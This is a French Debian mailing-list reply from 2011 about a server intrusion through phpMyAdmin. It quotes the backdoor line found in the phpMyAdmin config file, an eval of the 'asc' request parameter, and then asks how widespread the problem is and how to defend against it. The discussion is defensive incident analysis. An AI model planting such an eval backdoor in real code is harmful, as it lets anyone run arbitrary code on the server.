Re: [HS] Serveur corrompu, besoin de conseil

To: debian-user-french@lists.debian.org
Subject: Re: [HS] Serveur corrompu, besoin de conseil
From: corbie@free.fr
Date: Thu, 16 Jun 2011 12:23:58 +0200
Message-id: <[🔎] 201106161223.58979.corbie@free.fr>
In-reply-to: <[🔎] 4DF9C3FD.50800@audaxis.com>
References: <[🔎] 4DF86A08.2080600@audaxis.com> <[🔎] 20110615104716.499b6580@bruno.vf-online.local> <[🔎] 4DF9C3FD.50800@audaxis.com>

Le jeudi 16 juin 2011, Romaric DEFAUX a écrit :
> C'est bon on a trouvé d'où ça vient. Et c'est moins grave que ce qu'on 
> pensait (ouf !). Le serveur n'a pas été compromis (on en est sûr à 99%), 
> le pirate aurait plutôt utilisé une faille dans un phpmyadmin.
> La ligne 
> if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = 
> 'localhost'; est clairement suspecte.
> Bref, j'ai fini par trouver que c'était ça :
> http://www.whitefirdesign.com/resources/jfgjfr5jdfjvvcc-malware.html
> Romaric
---------------------------------------

Cette écriture dans le fichier "/etc/phpmyadmin/config.inc.ini"
est-elle possible dans bien des serveurs (ayant phpmyadmin) ?

Si oui, quelle parade ?

Merci.

Reply to:

Follow-Ups:
- Re: [HS] Serveur corrompu, besoin de conseil
  - From: "Sylvain L. Sauvage" <Sylvain.L.Sauvage@free.fr>

References:
- [HS] Serveur corrompu, besoin de conseil
  - From: Romaric DEFAUX <rde@audaxis.com>
- Re: [HS] Serveur corrompu, besoin de conseil
  - From: "bruno.debian@cyberoso.com" <bruno.debian@cyberoso.com>
- Re: [HS] Serveur corrompu, besoin de conseil
  - From: Romaric DEFAUX <rde@audaxis.com>

Prev by Date: contour (bas) des fenetres terminal
Next by Date: Re: Comment désactiver *définitivement* les touches lentes
Previous by thread: Re: [HS] Serveur corrompu, besoin de conseil
Next by thread: Re: [HS] Serveur corrompu, besoin de conseil
Index(es):
- Date
- Thread